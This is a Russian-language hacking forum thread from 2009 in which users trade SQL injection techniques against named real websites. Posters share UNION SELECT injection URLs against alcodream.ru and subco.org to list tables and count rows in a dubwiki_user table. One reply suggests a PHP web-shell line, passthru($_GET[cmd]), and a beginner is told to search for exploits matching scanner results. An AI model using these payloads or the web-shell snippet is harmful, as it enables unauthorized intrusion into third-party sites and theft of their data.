18.08.2009, 09:00
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами:
9838057
Репутация:
302
|
|
http://www.alcodream.ru/categoryID/80+UNION+SELECT%20group_concat(table_name)%20from% 20information_schema.tables%20--
Как вот сдесь сделать вывод просто если 80 заменить на 80-80 или там на 2923939 или "-" подставить скиыдывает на индекс.пхп
|
|
|
18.08.2009, 13:13
|
|
Новичок
Регистрация: 29.04.2009
Сообщений: 4
С нами:
8965868
Репутация:
4
|
|
Наибанальнейший вопрос:
Допустим у меня есть сканер уязвимостей, он находит N колличество уязвимостей, а как мне их испольховать?
Если уже где-то это было прошу скинуть ссылку на этот топик.
|
|
|
|
18.08.2009, 13:20
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами:
9798146
Репутация:
1224
|
|
Сообщение от 6@llT0
Наибанальнейший вопрос:
Допустим у меня есть сканер уязвимостей, он находит N колличество уязвимостей, а как мне их испольховать?
Если уже где-то это было прошу скинуть ссылку на этот топик.
каких именно уязвимостей  их не две штуки что бы экстросенсорно догадаться
|
|
|
|
18.08.2009, 13:25
|
|
Новичок
Регистрация: 29.04.2009
Сообщений: 4
С нами:
8965868
Репутация:
4
|
|
Сообщение от it's my
каких именно уязвимостей их не две штуки что бы экстросенсорно догадаться Ну он ещё не досканировал...
А вообше я в этом нуб, нубом вот и пытаюсь хоть как-то разобраться=)
|
|
|
|
18.08.2009, 13:19
|
|
Новичок
Регистрация: 19.07.2009
Сообщений: 17
С нами:
8848606
Репутация:
2
|
|
6@llT0
Копируеш тип уязвимости и в гугл искать сплоит или хотяби тему на форуме www.sevuritylab.ru, www.securityfocus.com, etc.
|
|
|
|
18.08.2009, 13:21
|
|
Новичок
Регистрация: 19.07.2009
Сообщений: 17
С нами:
8848606
Репутация:
2
|
|
Ребят, так таблица dubwiki_user не доступна или как ????
|
|
|
|
18.08.2009, 13:29
|
|
Новичок
Регистрация: 29.04.2009
Сообщений: 4
С нами:
8965868
Репутация:
4
|
|
И подскажите какой нибудь хорший скан=)
|
|
|
|
18.08.2009, 13:36
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
С нами:
9798146
Репутация:
1224
|
|
мозги и голова, хороший сканер 
и пытайся разобраться с разделов "Статьи" и "Избранное". |
|
|
|
18.08.2009, 13:36
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Ребят, так таблица dubwiki_user не доступна или как ????
Доступна, но там ноль записей, пусто там, сравни вывод:
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,10,11,count(*),13+from+dubwiki_user--+
и
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+
|
|
|
|
18.08.2009, 14:41
|
|
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
С нами:
9561436
Репутация:
462
|
|
it's my, попробуй passthru($_GET[cmd]);
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
